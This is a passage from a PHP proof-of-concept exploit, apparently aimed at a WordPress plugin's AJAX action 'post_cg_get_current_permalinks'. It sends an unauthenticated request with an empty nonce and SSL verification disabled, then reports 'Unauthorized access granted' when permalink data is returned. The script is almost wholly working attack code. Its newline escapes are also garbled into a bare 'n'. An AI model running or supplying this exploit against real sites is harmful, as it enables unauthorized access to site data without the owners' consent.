    'action' => 'post_cg_get_current_permalinks',
    'cg_nonce' => '', // Empty nonce may still be verified but some versions accept
);

$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $ajax_url);
curl_setopt($ch2, CURLOPT_POST, true);
curl_setopt($ch2, CURLOPT_POSTFIELDS, http_build_query($data2));
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_HEADER, false);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);

$response2 = curl_exec($ch2);
$http_code2 = curl_getinfo($ch2, CURLINFO_HTTP_CODE);

if (curl_errno($ch2)) {
    echo "[!] cURL error: " . curl_error($ch2) . "n";
} else {
    echo "[*] HTTP Response Code: $http_code2n";
    echo "[*] Response body (first 500 chars): " . substr($response2, 0, 500) . "n";
    
    if (strpos($response2, 'permalink') !== false || $http_code2 == 200) {
        echo "[+] SUCCESS: Unauthorized access granted! Retrieved permalink data.n";
    } elseif ($http_code2 == 403) {
        echo "[-] Access denied (403). The target may be patched or has additional protection.n";
    }
}

curl_close($ch2);
?>